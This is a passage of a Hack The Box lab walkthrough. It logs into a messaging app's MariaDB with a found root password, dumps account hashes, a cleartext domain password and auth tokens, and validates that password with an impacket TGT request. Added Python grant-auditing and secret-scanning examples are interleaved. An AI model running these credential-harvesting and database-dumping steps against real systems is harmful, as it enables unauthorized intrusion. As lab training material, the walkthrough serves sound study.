Output Messenger DB
There is a MySQL instance running on port 14406
The DB credential has been identified
┌──(kali㉿kali)-[~/…/htb/labs/infiltrator/Output_Messenger]
└─$ proxychains4 -q mysql --host=localhost --port=14406 --user=root --password=ibWijteig5
ERROR 2026 (HY000): TLS/SSL error: SSL is required, but the server does not support it
It would appear that the target MySQL instance is configured to run in SSL
┌──(kali㉿kali)-[~/…/htb/labs/infiltrator/Output_Messenger]
└─$ proxychains4 -q mysql --host=localhost --port=14406 --user=root --password=ibWijteig5 --skip-ssl
Welcome to the MariaDB monitor. Commands end with ; or \g.
Your MariaDB connection id is 20
Server version: 10.1.19-MariaDB mariadb.org binary distribution
Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.
Support MariaDB developers by giving a star at https://github.com/MariaDB/server
Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.
MariaDB [(none)]>
Authenticated.
Ignoring SSL policy with the --skip-ssl flag.
MariaDB [(none)]> SHOW GRANTS FOR CURRENT_USER;
+----------------------------------------------------------------------------------------------------------------------------------------+
| Grants for root@localhost |
+----------------------------------------------------------------------------------------------------------------------------------------+
| GRANT ALL PRIVILEGES ON *.* TO 'root'@'localhost' IDENTIFIED BY PASSWORD '*5231D85B94E33260842B2EBB25BDF6B11B314C09' WITH GRANT OPTION |
| GRANT PROXY ON ''@'%' TO 'root'@'localhost' WITH GRANT OPTION |
+----------------------------------------------------------------------------------------------------------------------------------------+
2 rows in set (0.022 sec)
The current user has ALL PRIVILEGES
Pwned here already, as I could read any file on the dc01.infiltrator.htb host
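The grant rows above are what a database privilege review should flag. The following is an added example, not part of the original notes: a small auditor for SHOW GRANTS rows. The finding codes, the `wall_app` account and the placeholder hash are assumptions made for illustration.

```python
import re

# Privileges that reach beyond a single application schema.
# ALL PRIVILEGES at global scope includes FILE (server-side file read/write).
RISKY = {"ALL PRIVILEGES", "FILE", "SUPER", "PROCESS", "CREATE USER"}

GRANT_RE = re.compile(
    r"GRANT\s+(?P<privs>.+?)\s+ON\s+(?P<scope>\S+)\s+TO\s+"
    r"'(?P<user>[^']*)'@'(?P<host>[^']*)'(?P<rest>.*)",
    re.IGNORECASE,
)

def audit_grant(row):
    """Return sorted finding codes for one row of SHOW GRANTS output."""
    m = GRANT_RE.search(row)
    if not m:
        return []
    privs = {p.strip().upper() for p in m["privs"].split(",")}
    rest = m["rest"].upper()
    codes = set()
    if privs == {"PROXY"}:
        codes.add("proxy")               # may act as accounts matching the scope
    elif m["scope"] == "*.*" and privs & RISKY:
        codes.add("global-risky-privs")  # server-wide, not limited to one schema
    if "WITH GRANT OPTION" in rest:
        codes.add("grant-option")        # can pass its privileges to other accounts
    if "IDENTIFIED BY PASSWORD" in rest:
        codes.add("hash-in-output")      # captured output now contains a password hash
    return sorted(codes)

# Constructed sample rows: the first two follow the shape of the output above
# (hash replaced by a placeholder); the third is a hypothetical scoped account.
ROWS = [
    "| GRANT ALL PRIVILEGES ON *.* TO 'root'@'localhost' IDENTIFIED BY PASSWORD '*PLACEHOLDER_HASH' WITH GRANT OPTION |",
    "| GRANT PROXY ON ''@'%' TO 'root'@'localhost' WITH GRANT OPTION |",
    "| GRANT SELECT, INSERT, UPDATE, DELETE ON `outputwall`.* TO 'wall_app'@'localhost' |",
]

if __name__ == "__main__":
    for row in ROWS:
        print(audit_grant(row), "<-", row.strip("| "))
```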
MariaDB [(none)]> show databases;
+--------------------+
| Database |
+--------------------+
| information_schema |
| mysql |
| outputwall |
| performance_schema |
+--------------------+
4 rows in set (0.024 sec)
MariaDB [(none)]> use outputwall;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A
Database changed
outputwall
MariaDB [outputwall]> show tables;
+---------------------------+
| Tables_in_outputwall |
+---------------------------+
| ot_attachment |
| ot_comments |
| ot_entity |
| ot_entity_accounts |
| ot_entity_daysoff |
| ot_entity_setting |
| ot_sessions |
| ot_user_notification_read |
| ot_user_notifications |
| ot_wall_activity |
| ot_wall_favorite |
| ot_wall_notification |
| ot_wall_posts |
| ot_wall_tagmessages |
| ot_wall_tags |
| ot_wall_tokens |
| ot_wall_usermessages |
+---------------------------+
17 rows in set (0.021 sec)
Entity Accounts
MariaDB [outputwall]> show ot_entity_accounts;
ERROR 1064 (42000): You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near 'ot_entity_accounts' at line 1
MariaDB [outputwall]> select * from ot_entity_accounts;
+-----------+--------------+---------------------------------------+-----------+---------------------+---------------------+------------------------------------------+-----------+-----------+---------------------+-----------+------+-------------+---------+------+
| entity_id | company_name | domain_url | user_name | register_date | email | password | db_string | is_active | exp_date | max_users | plan | license_key | gdomain | type |
+-----------+--------------+---------------------------------------+-----------+---------------------+---------------------+------------------------------------------+-----------+-----------+---------------------+-----------+------+-------------+---------+------+
| 1 | Demo | 10.10.10.10:14126,105.69.247.2
:14126 | admin | 2014-10-18 10:46:30 | demo@outputtime.com | 38f078a81a2b033d197497af5b77f95b50bfcfb8 | | 1 | 2031-10-29 06:23:42 | 0 | T | | | |
+-----------+--------------+---------------------------------------+-----------+---------------------+---------------------+------------------------------------------+-----------+-----------+---------------------+-----------+------+-------------+---------+------+
1 row in set (0.021 sec)
38f078a81a2b033d197497af5b77f95b50bfcfb8
hashcat was unable to crack the hash
Posts
MariaDB [outputwall]> select * from ot_wall_posts;
+---------+-----------+------------+---------+---------+-----------+--------------------------------------------------------------+-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+--------------+------------+-----------+----------+------------+-------+-----------+-----+-----------------+----------------+
| post_id | entity_id | post_date | post_by | post_to | post_type | post_subject | post_message | post_content | post_input | followers | unfollow | like_count | liked | ack_count | ack | keep_ontop_till | comments_count |
+---------+-----------+------------+---------+---------+-----------+--------------------------------------------------------------+-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+--------------+------------+-----------+----------+------------+-------+-----------+-----+-----------------+----------------+
| 1 | 1 | 1708532113 | 7 | | M | UserExplorer app project | Hey team, I'm here! In this screenshot, I'll guide you through using the app UserExplorer.exe. It works seamlessly with dev credentials, but remember, it's versatile and functions with any credentials. Currently, we're exploring the default option. Stay tuned for more updates!
"UserExplorer.exe -u m.harris -p D3v3l0p3r_Pass@1337! -s M.harris" | | | ,7,9, | | 2 | ,9,1, | 0 | | 0 | 1 |
| 2 | 1 | 1708532650 | 9 | | M | Security Alert! Pre-Auth Disabled on kerberos for Some Users | Hey team,
We've identified a security concern: some users and our domain (dc01.infiltrator.htb) have pre-authentication disabled on kerberos.
No need to panic! Our vigilant team is already on it and will work diligently to fix this. In the meantime, stay vigilant and be cautious about any potential security risks. | | | ,9, | | 1 | ,1, | 0 | | 0 | 0 |
+---------+-----------+------------+---------+---------+-----------+--------------------------------------------------------------+-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+--------------+------------+-----------+----------+------------+-------+-----------+-----+-----------------+----------------+
2 rows in set (0.022 sec)
The ot_wall_posts table contains a post with a CLEARTEXT credential of the m.harris user; D3v3l0p3r_Pass@1337!
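A post like this is something a content scan on the messaging platform can catch before or after it is stored. The following is an added example, not part of the original notes: a scanner that flags and redacts command-line and key/value secrets in post bodies. The rule names and the sample posts are constructed for illustration.

```python
import re

# Each rule marks the secret itself with a named group so it can be redacted.
PATTERNS = {
    "cli_short_flag": re.compile(r"(?<![\w-])-p[ =](?P<secret>[^\s\"']{6,})"),
    "cli_long_flag": re.compile(r"--pass(?:word)?[ =](?P<secret>[^\s\"']+)", re.I),
    "key_value": re.compile(
        r"\b(?:password|passwd|pwd)\s*[:=]\s*(?P<secret>[^\s\"']+)", re.I),
}

def scan_post(text):
    """Return (redacted_text, sorted rule names that fired) for one post body."""
    spans = []  # (start, end, rule) of every secret found
    for rule, rx in PATTERNS.items():
        for m in rx.finditer(text):
            start, end = m.span("secret")
            if m["secret"].isdigit():
                continue  # "-p 144060" is a port number, not a password
            if any(start < e and s < end for s, e, _ in spans):
                continue  # same secret already matched by an earlier rule
            spans.append((start, end, rule))
    redacted = text
    for start, end, _ in sorted(spans, reverse=True):  # right to left keeps offsets valid
        redacted = redacted[:start] + "[REDACTED]" + redacted[end:]
    return redacted, sorted(rule for _, _, rule in spans)

# Constructed sample posts, shaped like rows of a wall-post table (id, message).
POSTS = [
    (1, 'Demo of the tool: "ExampleTool.exe -u j.doe -p Examp1e_Pass! -s j.doe"'),
    (2, "Security alert: some accounts have pre-authentication disabled."),
    (3, "Connect with mysql --user=app --password=S3cretValue then report back."),
    (4, "Listener is started with nc -l -p 144060 on the jump host."),
]

def flagged_posts(posts):
    """Map post id -> rules that fired, for posts containing at least one secret."""
    return {pid: rules for pid, msg in posts if (rules := scan_post(msg)[1])}

if __name__ == "__main__":
    for pid, msg in POSTS:
        print(pid, *scan_post(msg))
```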
Validation
┌──(kali㉿kali)-[~/archive/htb/labs/infiltrator]
└─$ impacket-getTGT INFILTRATOR.HTB/m.harris@dc01.infiltrator.htb -dc-ip $IP
Impacket v0.12.0.dev1 - Copyright 2023 Fortra
Password: D3v3l0p3r_Pass@1337!
[*] Saving ticket in m.harris@dc01.infiltrator.htb.ccache
Successfully Validated
TGT re-generated for the m.harris user
Attachment
MariaDB [outputwall]> select * from ot_attachment;
+---------------+-----------+-----------+---------------+-------------+-----------+--------------------------------------+-----------+-------+---------------+---------------------+---------+-----------+---------------------+
| attachment_id | entity_id | file_type | file_name | module_type | module_id | file_path | file_size | title | checkedout_by | checkedout_date | version | posted_by | posted_date |
+---------------+-----------+-----------+---------------+-------------+-----------+--------------------------------------+-----------+-------+---------------+---------------------+---------+-----------+---------------------+
| 1 | 1 | png | SS_1657239581 | O | 1 | 7c96d28148f90cc4bdf1168f57a13fe9.png | 13799.000 | | 0 | 0000-00-00 00:00:00 | 0 | 7 | 2024-02-21 16:15:13 |
+---------------+-----------+-----------+---------------+-------------+-----------+--------------------------------------+-----------+-------+---------------+---------------------+---------+-----------+---------------------+
1 row in set (0.022 sec)
Auth Token
MariaDB [outputwall]> select * from ot_wall_tokens;
+----------+---------+------------+---------------------------+-----------+-----------+-------------------------------------------------------------------------------+---------------------+
| token_id | user_id | first_name | email | user_role | entity_id | auth_token | expiry_date |
+----------+---------+------------+---------------------------+-----------+-----------+-------------------------------------------------------------------------------+---------------------+
| 1 | 7 | K.turner | turner@infiltrator.htb | U | 1 | iX9Z\/yslevNIY0R6aKNzBebgT_KpW4BlaGHjWS1zpd5QcmaRx8UGwBvaMxy3Q3Wb2E5XhI9lpIo= | 2024-02-22 00:00:00 |
| 7 | 9 | winrm_svc | winrm_svc@infiltrator.htb | U | 1 | iX9Z\/yslevMmHLWW_pvaVChN6kbwB_cbGHvAA75yee65xBQMd20Dgmf2iXD18Oq9hiwcgIfB1uo= | 2024-02-26 00:00:00 |
| 16 | 1 | Admin | | A | 1 | iX9Z\/yslevMJZgSfyKCEdHJE3RjYRSAMORYGfFRYTag9N3WBn20KJi_aWmmymhdJ | 2024-09-03 00:00:00 |
+----------+---------+------------+---------------------------+-----------+-----------+-------------------------------------------------------------------------------+---------------------+
3 rows in set (0.021 sec)